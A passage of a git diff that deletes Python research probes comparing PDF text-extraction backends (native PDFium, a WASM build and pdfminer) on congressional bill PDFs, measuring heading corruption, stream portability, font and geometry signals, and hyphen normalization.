tuple[list[dict], dict]: - raw = textpage.raw - n = R.FPDFText_CountChars(raw) - buf = (ctypes.c_char * _FONT_BUF)() - flags = ctypes.c_int() - recs: list[dict] = [] - for i in range(max(n, 0)): - cp = R.FPDFText_GetUnicode(raw, i) - - left, right, bottom, top = (ctypes.c_double() for _ in range(4)) - has_box = bool( - R.FPDFText_GetCharBox( - raw, i, ctypes.byref(left), ctypes.byref(right), ctypes.byref(bottom), ctypes.byref(top) - ) - ) - lb = R.FS_RECTF() - has_loose = bool(R.FPDFText_GetLooseCharBox(raw, i, ctypes.byref(lb))) - ox, oy = ctypes.c_double(), ctypes.c_double() - has_origin = bool(R.FPDFText_GetCharOrigin(raw, i, ctypes.byref(ox), ctypes.byref(oy))) - mat = R.FS_MATRIX() - has_matrix = bool(R.FPDFText_GetMatrix(raw, i, ctypes.byref(mat))) - - fs = R.FPDFText_GetFontSize(raw, i) - scale = math.sqrt(mat.a * mat.a + mat.b * mat.b) if has_matrix else float("nan") - - nlen = R.FPDFText_GetFontInfo(raw, i, buf, _FONT_BUF, ctypes.byref(flags)) - font = bytes(buf[: max(nlen - 1, 0)]).decode("utf-8", "replace") if nlen > 0 else "" - - recs.append( - { - "i": i, - "cp": cp, - "ch": chr(cp) if cp else "", - "generated": _tri(R.FPDFText_IsGenerated(raw, i)), - "hyphen": _tri(R.FPDFText_IsHyphen(raw, i)), - "map_error": _tri(R.FPDFText_HasUnicodeMapError(raw, i)), - "text_index": R.FPDFText_GetTextIndexFromCharIndex(raw, i), - "box": [left.value, bottom.value, right.value, top.value] if has_box else None, - "loose": [lb.left, lb.bottom, lb.right, lb.top] if has_loose else None, - "origin": [ox.value, oy.value] if has_origin else None, - "matrix": [mat.a, mat.b, mat.c, mat.d, mat.e, mat.f] if has_matrix else None, - "font_size_raw": fs, - "font_size_scaled": fs * scale if has_matrix else None, - "font": font, - "font_flags": flags.value if nlen > 0 else None, - "font_weight": R.FPDFText_GetFontWeight(raw, i), - "angle": R.FPDFText_GetCharAngle(raw, i), - } - ) - w, h = page_obj.get_size() - return recs, {"count_chars": n, "width": float(w), "height": float(h)} - - -def main() -> int: - ap = argparse.ArgumentParser() - ap.add_argument("pdf") - ap.add_argument("--page", type=int, required=True, help="1-based") - ap.add_argument("--grep", help="show a window around each occurrence in the text stream") - ap.add_argument("--window", type=int, default=24) - ap.add_argument("--json-out", type=Path) - args = ap.parse_args() - - doc = pdfium.PdfDocument(args.pdf) - try: - page_obj = doc[args.page - 1] - textpage = page_obj.get_textpage() - try: - text_range = textpage.get_text_range() - recs, meta = char_records(textpage, page_obj) - finally: - textpage.close() - page_obj.close() - finally: - doc.close() - - stream = "".join(r["ch"] for r in recs) - print(f"# {args.pdf} page {args.page}") - print(f"FPDFText_CountChars = {meta['count_chars']}") - print(f"len(get_text_range()) = {len(text_range)}") - print(f"len(per-index GetUnicode)= {len(stream)}") - print(f"streams identical = {text_range == stream}") - gen = [r for r in recs if r["generated"]] - hyp = [r for r in recs if r["hyphen"]] - print(f"generated chars = {len(gen)} (codepoints: {sorted({r['cp'] for r in gen})})") - print(f"hyphen-flagged chars = {len(hyp)} (codepoints: {sorted({r['cp'] for r in hyp})})") - print(f"tri-state unsupported = {sum(1 for r in recs if r['generated'] is None)}") - - if gen: - print("\n## geometry of GENERATED characters") - _describe(gen) - real_sp = [r for r in recs if r["cp"] == 32 and not r["generated"]] - if real_sp: - print("\n## geometry of REAL (content-stream) space characters") - _describe(real_sp) - - if args.grep: - print(f"\n## windows around {args.grep!r} in the char stream") - start = 0 - while True: - k = stream.find(args.grep, start) - if k < 0: - break - lo, hi = max(0, k - 2), min(len(recs), k + len(args.grep) + args.window) - print(f"\n--- match at char index {k} ---") - _table(recs[lo:hi]) - start = k + 1 - - if args.json_out: - args.json_out.parent.mkdir(parents=True, exist_ok=True) - args.json_out.write_text(json.dumps({"meta": meta, "chars": recs}, indent=1)) - print(f"\nwrote {args.json_out}") - return 0 - - -def _describe(rows: list[dict]) -> None: - n = len(rows) - no_box = sum(1 for r in rows if r["box"] is None) - zero_w = sum(1 for r in rows if r["box"] and abs(r["box"][2] - r["box"][0]) < 1e-9) - zero_h = sum(1 for r in rows if r["box"] and abs(r["box"][3] - r["box"][1]) < 1e-9) - no_mat = sum(1 for r in rows if r["matrix"] is None) - ident = sum(1 for r in rows if r["matrix"] and r["matrix"][:4] == [1.0, 0.0, 0.0, 1.0]) - zero_fs = sum(1 for r in rows if not r["font_size_raw"]) - no_font = sum(1 for r in rows if not r["font"]) - sizes = sorted({round(r["font_size_scaled"], 3) for r in rows if r["font_size_scaled"] is not None}) - print(f" n={n} no charbox={no_box} zero-width box={zero_w} zero-height box={zero_h}") - print(f" no matrix={no_mat} identity matrix={ident} font_size_raw==0={zero_fs} empty font name={no_font}") - print(f" distinct scaled sizes={sizes[:8]}{' …' if len(sizes) > 8 else ''}") - - -def _table(rows: list[dict]) -> None: - cols = ("idx", "ch", "cp", "gen", "hyp", "x0", "x1", "orig_y", "mat.f", "size", "font") - print( - f"{cols[0]:>6} {cols[1]:<4} {cols[2]:>6} {cols[3]:>4} {cols[4]:>4} {cols[5]:>8} " - f"{cols[6]:>8} {cols[7]:>8} {cols[8]:>8} {cols[9]:>7} {cols[10]:<24}" - ) - for r in rows: - b = r["box"] or [float("nan")] * 4 - o = r["origin"] or [float("nan")] * 2 - m = r["matrix"] or [float("nan")] * 6 - ch = repr(r["ch"])[1:-1] if r["ch"] not in ("", " ") else ("SP" if r["ch"] == " " else "?") - sz = r["font_size_scaled"] - print( - f"{r['i']:>6} {ch:<4} {r['cp']:>6} {str(r['generated'])[:4]:>4} {str(r['hyphen'])[:4]:>4} " - f"{b[0]:>8.2f} {b[2]:>8.2f} {o[1]:>8.2f} {m[5]:>8.2f} " - f"{(f'{sz:.2f}' if sz is not None else 'NA'):>7} {r['font'][:24]:<24}" - ) - - -if __name__ == "__main__": - sys.exit(main()) diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_failure_headings.py b/docs/research/pdf-backend-bakeoff/probes/probe_failure_headings.py deleted file mode 100644 index a0dc188c..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_failure_headings.py +++ /dev/null @@ -1,121 +0,0 @@ -"""The four named failure headings, on all four paths, at the line where they are set. - -`RESULTS-CONFIRMATORY.md` names `FAMILYHOUSING`, `NAVYAND`, `ARMYNATIONAL` and -`AMERICANBATTLE` as malformed labels the neutral glyph layer produces and production does -not. This probe compares the four paths on the exact printed lines those labels come from, -so the comparison is at the character level rather than at the aggregate. - -The comparison is deliberately made on the RECONSTRUCTED PRINTED LINE, not on the anchor -label. An anchor label is the product of the heading detector, which merges stacked lines -and can mask or manufacture a difference that did not originate in extraction. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_failure_headings.py -""" - -from __future__ import annotations - -import argparse -import json -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(PROBES / "backends"), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import pdfium_hybrid # noqa: E402 -import reconstruct_hybrid as RH # noqa: E402 -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct as reconstruct_glyph # noqa: E402 - -from deltatrack.parsers.pdf_text import extract_clean_pages # noqa: E402 - -# The GPO-printed forms. A path is correct on a line when it reproduces the spelling GPO -# set, which is the standard the request names and which no pipeline's output defines. -TARGETS = ("FAMILY HOUSING", "NAVY AND", "ARMY NATIONAL", "AMERICAN BATTLE") -# The corrupted forms the confirmatory run reported, i.e. the same text with the word -# space lost. Matched separately so a path that produces neither is not scored as correct. -CORRUPT = {t: t.replace(" ", "", 1) for t in TARGETS} - -DEFAULT_DOCS = ( - "114-hr-2029/4_reported-in-senate", - "118-hr-4366/5_engrossed-amendment-house", - "116-hr-1865/6_enrolled-bill", -) - - -def pages_for(path: str, pdf: Path): - if path == "production": - return extract_clean_pages(pdf) - if path == "hybrid": - raw, _ = pdfium_hybrid.extract(pdf) - return RH.reconstruct(raw)[0] - backend = "pdfium-native" if path == "glyph" else "pdfminer" - raw, _ = run_backend(backend, pdf) - return reconstruct_glyph(raw, repaired=True)[0] - - -def occurrences(pages, target: str, corrupt: str) -> dict: - """Count printed lines carrying the correct form and the corrupted form.""" - ok, bad, samples = 0, 0, [] - for page in pages: - for ln in page.print_lines: - if target in ln.text: - ok += 1 - elif corrupt in ln.text: - bad += 1 - if len(samples) < 3: - samples.append(f"p{page.page_number} L{ln.line_number}: {ln.text[:64]}") - return {"correct": ok, "corrupted": bad, "samples": samples} - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--docs", nargs="*", default=list(DEFAULT_DOCS)) - ap.add_argument("--paths", nargs="*", default=["production", "glyph", "hybrid", "pdfminer"]) - ap.add_argument("--out", type=Path) - args = ap.parse_args() - - results: dict = {} - for doc in args.docs: - pdf = REPO / "tests" / "corpus" / f"{doc}.pdf" - if not pdf.exists(): - print(f"SKIP {doc}: not in corpus", file=sys.stderr) - continue - print(f"\n## {doc}") - header = f" {'heading':<16} " + " ".join(f"{p:>22}" for p in args.paths) - print(header) - page_sets = {} - for path in args.paths: - try: - page_sets[path] = pages_for(path, pdf) - except Exception as exc: # noqa: BLE001 - print(f" {path} FAILED: {type(exc).__name__}: {exc}", file=sys.stderr) - doc_res: dict = {} - for target in TARGETS: - cells = [] - for path in args.paths: - if path not in page_sets: - cells.append(f"{'ERROR':>22}") - continue - o = occurrences(page_sets[path], target, CORRUPT[target]) - doc_res.setdefault(target, {})[path] = o - cells.append(f"{o['correct']:>10} ok {o['corrupted']:>7} bad") - print(f" {target:<16} " + " ".join(cells)) - results[doc] = doc_res - for target, per in doc_res.items(): - for path, o in per.items(): - for s in o["samples"]: - print(f" [{path}] {target}: {s}") - - if args.out: - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_hybrid_portability.py b/docs/research/pdf-backend-bakeoff/probes/probe_hybrid_portability.py deleted file mode 100644 index 240f1cd7..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_hybrid_portability.py +++ /dev/null @@ -1,201 +0,0 @@ -"""Does the hybrid contract survive the browser-shippable PDFium build? - -Two questions, and the second is the one that decides anything: - - 1. Do native PDFium and PDFium-WASM emit the same CHARACTER STREAM? Measured: no -- - the WASM build omits the line-trailing space native keeps at the end of most printed - lines. That is a real build difference and it is reported rather than smoothed over. - - 2. Do the two produce the same DELTATRACK PAGES through the hybrid layer? This is what - a migration decision rests on, because a difference the reconstruction removes is - not a difference a staffer can see. Asserted on the rendered `pdf_full_text` digest, - the line-number set and the heading-label set, not on the raw stream. - -Question 2 cannot be inferred from question 1 in either direction, which is why both are -measured. A stream difference may be harmless; stream identity would still not prove the -pages match, since the two paths could diverge later. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_hybrid_portability.py \ - tests/corpus/114-hr-2029/4_reported-in-senate.pdf --limit 40 -""" - -from __future__ import annotations - -import argparse -import difflib -import hashlib -import json -import subprocess -import sys -import threading -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(PROBES / "backends"), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_metrics as M # noqa: E402 -import pdfium_hybrid # noqa: E402 -import reconstruct_hybrid as RH # noqa: E402 -from contract_hybrid import CP, HybridPage # noqa: E402 - -from deltatrack.parsers.pdf_anchors import extract_anchors # noqa: E402 -from deltatrack.parsers.pdf_text import pdf_full_text # noqa: E402 - -SCRIPT = PROBES / "js" / "dump_pdfium_hybrid_wasm.mjs" - - -def run_wasm(pdf: Path, limit: int | None) -> tuple[list[HybridPage], dict]: - cmd = ["node", "--max-old-space-size=8192", str(SCRIPT), str(pdf.resolve())] - if limit is not None: - cmd += ["--limit", str(limit)] - proc = subprocess.Popen( - cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, cwd=str(SCRIPT.parent), bufsize=1 << 20 - ) - assert proc.stdout is not None and proc.stderr is not None - err: list[str] = [] - drain = threading.Thread(target=lambda: err.append(proc.stderr.read())) - drain.start() - pages: list[HybridPage] = [] - summary: dict = {} - for line in proc.stdout: - line = line.strip() - if not line: - continue - obj = json.loads(line) - if "summary" in obj: - summary = obj["summary"] - else: - pages.append( - HybridPage( - obj["page_number"], - obj["width"], - obj["height"], - [tuple(c[:6] + [tuple(c[6]) if c[6] else None] + c[7:]) for c in obj["chars"]], - ) - ) - proc.stdout.close() - drain.join() - proc.wait() - if proc.returncode != 0: - raise RuntimeError("".join(err)[-2000:]) - return pages, summary - - -def stream(pages: list[HybridPage]) -> str: - return "\n".join("".join(chr(c[CP]) for c in p.chars) for p in pages) - - -def classify_stream(nat: list[HybridPage], wasm: list[HybridPage]) -> dict: - """Every native-vs-WASM divergence, sorted into named kinds. - - Compared PAGE BY PAGE, not document-wide: `difflib` is quadratic and a 129k-character - committee report does not finish in a useful time as one string. - - "Harmless" has to be a claim about WHAT differs, not about how few differences there - are, so each op is classified and anything that does not fit a named kind is counted - as `unclassified` and sampled. An unclassified count above zero is the signal that - this probe's conclusion no longer covers the evidence. - """ - kinds = {"line_trailing_space": 0, "line_break_vs_space": 0, "unclassified": 0} - samples: list[str] = [] - for a, b in zip(nat, wasm): - ns = "".join(chr(c[CP]) for c in a.chars) - ws = "".join(chr(c[CP]) for c in b.chars) - if ns == ws: - continue - for tag, i1, i2, j1, j2 in difflib.SequenceMatcher(a=ns, b=ws, autojunk=False).get_opcodes(): - if tag == "equal": - continue - seg, other = ns[i1:i2], ws[j1:j2] - if tag == "delete" and set(seg) <= {" "} and ns[i2 : i2 + 1] in ("\r", "\n", ""): - kinds["line_trailing_space"] += 1 - elif tag == "replace" and set(seg) <= {"\r", "\n"} and set(other) <= {" "}: - # The WASM build joins two printed lines the native build separates. It - # cannot reach the reconstruction, which assigns lines by baseline and - # discards the engine's break characters outright. - kinds["line_break_vs_space"] += 1 - else: - kinds["unclassified"] += 1 - if len(samples) < 5: - samples.append(f"p{a.page_number} {tag}: native={seg[:40]!r} wasm={other[:40]!r}") - return {"kinds": kinds, "unclassified_samples": samples, "all_classified": kinds["unclassified"] == 0} - - -def facts(pages: list[HybridPage]) -> dict: - dt_pages, diag = RH.reconstruct(pages) - text, _ = pdf_full_text(dt_pages) - return { - "text_sha256": hashlib.sha256(text.encode()).hexdigest(), - "text": text, - "line_numbers": sorted( - (p.page_number, ln.line_number) for p in dt_pages for ln in p.print_lines if ln.line_number is not None - ), - "labels": {M.norm_label(a.text) for a in extract_anchors(dt_pages) if a.kind in M.PDF_HEADING_KINDS and a.text}, - "diag": diag, - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("pdfs", nargs="+") - ap.add_argument("--limit", type=int, default=None, help="pages per document") - ap.add_argument("--out", type=Path) - args = ap.parse_args() - - out: dict = {} - for path in args.pdfs: - pdf = Path(path) - nat_pages, nat_sum = pdfium_hybrid.extract(pdf, args.limit) - wasm_pages, wasm_sum = run_wasm(pdf, args.limit) - ns, ws = stream(nat_pages), stream(wasm_pages) - cls = classify_stream(nat_pages, wasm_pages) - nf, wf = facts(nat_pages), facts(wasm_pages) - entry = { - "native_summary": nat_sum, - "wasm_summary": wasm_sum, - "stream_identical": ns == ws, - "stream_chars_native": len(ns), - "stream_chars_wasm": len(ws), - "stream_diff_kinds": cls["kinds"], - "stream_all_divergences_classified": cls["all_classified"], - "stream_unclassified_samples": cls["unclassified_samples"], - "pages_text_identical": nf["text_sha256"] == wf["text_sha256"], - "pages_line_numbers_identical": nf["line_numbers"] == wf["line_numbers"], - "pages_labels_identical": nf["labels"] == wf["labels"], - "n_labels": len(nf["labels"]), - "n_line_numbers": len(nf["line_numbers"]), - "label_diff": sorted(nf["labels"] ^ wf["labels"])[:10], - } - if not entry["pages_text_identical"]: - d = list(difflib.unified_diff(nf["text"].split("\n"), wf["text"].split("\n"), lineterm="", n=0)) - entry["text_diff_sample"] = d[:20] - out[path] = entry - print(f"\n## {path} (pages limit={args.limit})") - print(f" raw char stream identical : {entry['stream_identical']}") - print(f" divergences by kind : {entry['stream_diff_kinds']}") - print(f" every divergence classified : {entry['stream_all_divergences_classified']}") - for s in entry["stream_unclassified_samples"]: - print(f" UNCLASSIFIED {s}") - print(" --- after the hybrid layer ---") - print(f" pdf_full_text digest identical : {entry['pages_text_identical']}") - print(f" line-number set identical ({entry['n_line_numbers']}) : {entry['pages_line_numbers_identical']}") - print(f" heading-label set identical ({entry['n_labels']}) : {entry['pages_labels_identical']}") - if entry["label_diff"]: - print(f" label symmetric difference : {entry['label_diff']}") - if entry.get("text_diff_sample"): - print(" text diff sample:") - for ln in entry["text_diff_sample"]: - print(f" {ln}") - - if args.out: - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(out, indent=1, default=str)) - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_hybrid_signals.py b/docs/research/pdf-backend-bakeoff/probes/probe_hybrid_signals.py deleted file mode 100644 index 02833218..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_hybrid_signals.py +++ /dev/null @@ -1,260 +0,0 @@ -"""Does the hybrid contract still carry every geometry/style signal DeltaTrack needs? - -The hybrid stream adds characters that carry no geometry. That is a real cost and this -probe prices it, rather than letting the heading-recovery win stand in for the answer. - -Three questions: - - S1 How much of the stream is generated, and is the "generated chars have no usable - geometry" claim exactly true or merely mostly true? Reported as rates over every - generated char, because a single generated char with a REAL box would mean the - contract's `None` fields are throwing away information. - - S2 Do the signals the engine actually consumes survive? `glyph_size` (ADR 0012 heading - levels) and `LineGeom` (the major detector's line-fullness split) are computed only - from non-generated characters, so the test is whether enough non-generated - characters remain on each printed line to compute them. - - S3 Does FONT ROLE separation survive? `docs/source-signal-inventory.md` records font - name as the highest-value unadopted PDF signal -- margin line numbers are a - different font from the body on 99.9% of numbered lines. Scored as role separation - (margin vs body vs chrome), never as name-string equality, since names are - print-class dependent. The empty-font-name rate is reported per stream because the - inventory's guard depends on it. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_hybrid_signals.py \ - tests/corpus/114-hr-2029/4_reported-in-senate.pdf --limit 40 -""" - -from __future__ import annotations - -import argparse -import json -import re -import sys -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(PROBES / "backends"), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import pdfium_hybrid # noqa: E402 -import reconstruct_hybrid as RH # noqa: E402 -from contract_hybrid import CP, FONT, GEN, SIZE, X0, X1 # noqa: E402 - -_NUMBERED = re.compile(r"^(\d{1,2}) (.*)$") - - -def s1_generated(pages) -> dict: - tot = gen = 0 - no_origin = real_box = non_identity_size = named_font = 0 - for pg in pages: - for c in pg.chars: - tot += 1 - if not c[GEN]: - continue - gen += 1 - if c[2] is None: # baseline / origin - no_origin += 1 - if c[X0] is not None and c[X1] is not None and c[X1] - c[X0] > 0: - real_box += 1 - if c[SIZE] is not None: - non_identity_size += 1 - if c[FONT]: - named_font += 1 - return { - "chars_total": tot, - "chars_generated": gen, - "generated_rate": round(gen / tot, 5) if tot else None, - "generated_missing_origin": no_origin, - "generated_with_real_box": real_box, - "generated_with_size": non_identity_size, - "generated_with_font_name": named_font, - "claim_generated_carry_only_origin": (no_origin == 0 and real_box == 0 and non_identity_size == 0), - } - - -def s2_signals(pages) -> dict: - """Every numbered printed line must still yield a size and a full LineGeom.""" - lines = with_size = with_geom = 0 - for pg in pages: - for row in RH.cluster_lines(pg): - text = RH._line_text(row) - m = _NUMBERED.match(text) - if not m: - continue - lines += 1 - ink = [c for c in row if chr(c[CP]) not in ("\r", "\n")] - content = ink[len(m.group(1)) :] - printed = [c for c in content if c[CP] != 32 and c[X0] is not None] - if printed and [c[SIZE] for c in printed if c[SIZE] is not None]: - with_size += 1 - if printed and RH._first_word_right(content) is not None: - with_geom += 1 - return { - "numbered_lines": lines, - "with_glyph_size": with_size, - "with_line_geom": with_geom, - "size_coverage": round(with_size / lines, 5) if lines else None, - "geom_coverage": round(with_geom / lines, 5) if lines else None, - } - - -def s3_font_roles(pages) -> dict: - """Margin-number font vs body font, over numbered printed lines. - - Keyed on role, not on a literal name: the margin font is whatever font the margin - digits are set in on this document, and the test is whether it DIFFERS from the font - of the body text on the same line. - """ - margin_fonts: Counter = Counter() - body_fonts: Counter = Counter() - separated = lines = 0 - empty_named = named_total = 0 - for pg in pages: - for row in RH.cluster_lines(pg): - text = RH._line_text(row) - m = _NUMBERED.match(text) - if not m: - continue - ink = [c for c in row if chr(c[CP]) not in ("\r", "\n")] - n_margin = len(m.group(1)) - mf = {c[FONT] for c in ink[:n_margin] if not c[GEN]} - bf = {c[FONT] for c in ink[n_margin:] if not c[GEN] and c[CP] != 32} - for c in ink: - if c[GEN]: - continue - named_total += 1 - if not c[FONT]: - empty_named += 1 - if not mf or not bf: - continue - lines += 1 - margin_fonts.update(mf) - body_fonts.update(bf) - if not (mf & bf): - separated += 1 - return { - "numbered_lines_with_both": lines, - "margin_font_differs_from_body": separated, - "separation_rate": round(separated / lines, 5) if lines else None, - "margin_fonts": margin_fonts.most_common(4), - "body_fonts": body_fonts.most_common(4), - "non_generated_chars": named_total, - "non_generated_empty_font_name": empty_named, - "empty_font_name_rate": round(empty_named / named_total, 6) if named_total else None, - } - - -def s4_geometry_agreement(pdf: Path, limit: int | None) -> dict: - """Do the sidecar VALUES agree with production's, not merely exist? - - S2 asks whether a `glyph_size` and a `LineGeom` could be computed. That is coverage, - and coverage is compatible with computing the wrong number everywhere. The heading - detector consumes these values directly -- `glyph_size` drives ADR 0012's size bands - and `first_word_right` drives the major detector's stacked-vs-wrapped split -- so the - stronger question is whether they match what production derives for the same line. - - Compared per (page, margin line number), which is the key production itself uses, over - the lines both paths recovered. Tolerance is 0.05 pt: these are floats derived through - different call paths, and an exact-equality test would report float noise as - disagreement. - """ - import reconstruct_hybrid as R - - from deltatrack.parsers.pdf_text import extract_clean_pages - - prod = extract_clean_pages(pdf) - hy, _ = R.reconstruct(pdfium_hybrid.extract(pdf, limit)[0]) - if limit: - prod = prod[:limit] - - def index(pages): - out = {} - for pg in pages: - for ln in pg.lines: - if ln.line_number is not None and ln.geom is not None: - out[(pg.page_number, ln.line_number)] = (ln.glyph_size, ln.geom) - return out - - p, h = index(prod), index(hy) - shared = p.keys() & h.keys() - tol = 0.05 - size_ok = left_ok = right_ok = fwr_ok = 0 - samples = [] - for k in shared: - (ps, pg_), (hs, hg) = p[k], h[k] - if ps is not None and hs is not None and abs(ps - hs) <= tol: - size_ok += 1 - if abs(pg_.content_left - hg.content_left) <= tol: - left_ok += 1 - if abs(pg_.content_right - hg.content_right) <= tol: - right_ok += 1 - if abs(pg_.first_word_right - hg.first_word_right) <= tol: - fwr_ok += 1 - elif len(samples) < 4: - samples.append(f"p{k[0]} L{k[1]}: production={pg_.first_word_right:.2f} hybrid={hg.first_word_right:.2f}") - n = len(shared) or 1 - return { - "lines_production": len(p), - "lines_hybrid": len(h), - "lines_shared": len(shared), - "glyph_size_agree": round(size_ok / n, 5), - "content_left_agree": round(left_ok / n, 5), - "content_right_agree": round(right_ok / n, 5), - "first_word_right_agree": round(fwr_ok / n, 5), - "first_word_right_disagreements": samples, - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("pdfs", nargs="+") - ap.add_argument("--limit", type=int, default=None) - ap.add_argument("--out", type=Path) - args = ap.parse_args() - - out = {} - for path in args.pdfs: - pages, summary = pdfium_hybrid.extract(Path(path), args.limit) - entry = { - "summary": summary, - "S1": s1_generated(pages), - "S2": s2_signals(pages), - "S3": s3_font_roles(pages), - "S4": s4_geometry_agreement(Path(path), args.limit), - } - out[path] = entry - print(f"\n## {path}") - s1, s2, s3 = entry["S1"], entry["S2"], entry["S3"] - print(f" S1 generated {s1['chars_generated']}/{s1['chars_total']} ({s1['generated_rate']:.1%})") - print( - f" of those: missing origin={s1['generated_missing_origin']} real box={s1['generated_with_real_box']}" - f" size={s1['generated_with_size']} font name={s1['generated_with_font_name']}" - ) - print(f" 'generated chars carry origin ONLY' holds exactly: {s1['claim_generated_carry_only_origin']}") - print(f" S2 numbered lines {s2['numbered_lines']}: size {s2['size_coverage']}, geom {s2['geom_coverage']}") - print(f" S3 margin/body font separation {s3['separation_rate']} over {s3['numbered_lines_with_both']} lines") - print(f" margin={s3['margin_fonts']} body={s3['body_fonts']}") - print(f" empty font-name rate on real chars: {s3['empty_font_name_rate']}") - s4 = entry["S4"] - print(f" S4 sidecar VALUES vs production over {s4['lines_shared']} shared numbered lines:") - print( - f" glyph_size={s4['glyph_size_agree']} content_left={s4['content_left_agree']} " - f"content_right={s4['content_right_agree']} first_word_right={s4['first_word_right_agree']}" - ) - for s in s4["first_word_right_disagreements"]: - print(f" disagreement {s}") - - if args.out: - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(out, indent=1)) - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_normalize_raw.py b/docs/research/pdf-backend-bakeoff/probes/probe_normalize_raw.py deleted file mode 100644 index 722c1def..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_normalize_raw.py +++ /dev/null @@ -1,188 +0,0 @@ -"""Is `normalize_raw` actually unnecessary under the hybrid contract, or only apparently? - -Section 8 of `RESULTS-HYBRID.md` claims every branch of `parsers/pdf_text.normalize_raw` -repairs damage that exists only in a page-wide text blob. Read from the code that claim is -plausible; it is not evidence. Two things could make it wrong: - - * A branch might fire on documents the corpus parity table EXCLUDES. Production declines - unnumbered layouts, and the enrolled bills it declines are exactly where the mid-line - soft-hyphen branch exists to act (its docstring names them). So the stratum that would - catch the failure is the stratum the headline table drops. - * The hybrid might produce the same fused or hyphen-broken words by another route, which - a bag-of-tokens F1 near 0.999 would not distinguish from success. - -So each branch is checked where it FIRES, and the check is a token-level classification of -production-vs-hybrid differences rather than a similarity score: - - hyphen_artifact a token on one side equals a token on the other with a hyphen added or - removed -- the exact damage normalize_raw's hyphen branches repair - space_artifact two tokens on one side are one fused token on the other - other everything else, sampled so it can be read - -A non-zero `hyphen_artifact` on a document where the branch fires falsifies the claim. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_normalize_raw.py \ - --limit-docs 6 --out docs/research/pdf-backend-bakeoff/results/probe_normalize_raw.json -""" - -from __future__ import annotations - -import argparse -import json -import re -import sys -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(PROBES / "backends"), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import pdfium_hybrid # noqa: E402 -import reconstruct_hybrid as RH # noqa: E402 -from score_phase1 import corpus_documents # noqa: E402 - -import deltatrack.parsers.pdf_text as PT # noqa: E402 - -# The branches of normalize_raw, each with the pattern that shows it fired on the raw text. -BRANCHES = { - "crlf": re.compile(r"\r\n"), - "hyphen_plus_margin_number": PT._HYPHEN_BREAK, - "glued_chrome": PT._GLUED_CHROME, - "midline_hyphen_lowercase": re.compile(r"￾[a-z]"), - "other_soft_hyphen": re.compile(r"￾"), - "trailing_space": re.compile(r"[^\S\n] *\n"), -} - - -def raw_page_texts(pdf: Path) -> list[str]: - """PDFium's raw text per page — the input normalize_raw was written against.""" - import pypdfium2 as pdfium - - doc = pdfium.PdfDocument(str(pdf)) - out = [] - try: - for i in range(len(doc)): - pg = doc[i] - tp = pg.get_textpage() - try: - out.append(tp.get_text_range()) - finally: - tp.close() - pg.close() - finally: - doc.close() - return out - - -def classify(prod_text: str, hy_text: str) -> dict: - """Direct measures of the damage `normalize_raw`'s hyphen branches prevent. - - WHAT THIS DELIBERATELY DOES NOT DO, because the first version of it did and was wrong: - it does not pair tokens by searching the other side's whole-document bag. At ~100k - tokens, "does SOME split of this token into two tokens present somewhere in the - document exist" is trivially satisfiable, and it reported production's legitimate - `a pro rata share` as evidence that the hybrid had fused `pro` + `vided` — two - unrelated words from different pages. A test that can be satisfied by coincidence - cannot distinguish a defect from its absence. - - What replaces it is a set difference over the tokens that CARRY a hyphen, which is - exactly the population the branches act on. If the hybrid failed to rejoin `pro-vided`, - that token appears in its hyphenated set and not in production's. A stray soft-hyphen - character surviving into the rendered text is counted directly, as is a token left - ending in a hyphen — an unrejoined syllable break, the specific failure the mid-line - branch exists to prevent. - """ - p_tok, h_tok = prod_text.split(), hy_text.split() - p_hy = {t for t in p_tok if "-" in t} - h_hy = {t for t in h_tok if "-" in t} - only_h = sorted(h_hy - p_hy) - only_p = sorted(p_hy - h_hy) - return { - "tokens_production": len(p_tok), - "tokens_hybrid": len(h_tok), - "trailing_hyphen_production": sum(1 for t in p_tok if t.endswith("-")), - "trailing_hyphen_hybrid": sum(1 for t in h_tok if t.endswith("-")), - "soft_hyphen_chars_production": prod_text.count("￾") + prod_text.count("\xad"), - "soft_hyphen_chars_hybrid": hy_text.count("￾") + hy_text.count("\xad"), - "hyphenated_tokens_production": len(p_hy), - "hyphenated_tokens_hybrid": len(h_hy), - "hyphenated_only_in_hybrid": len(only_h), - "hyphenated_only_in_production": len(only_p), - "samples_only_in_hybrid": only_h[:8], - "samples_only_in_production": only_p[:8], - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--limit-docs", 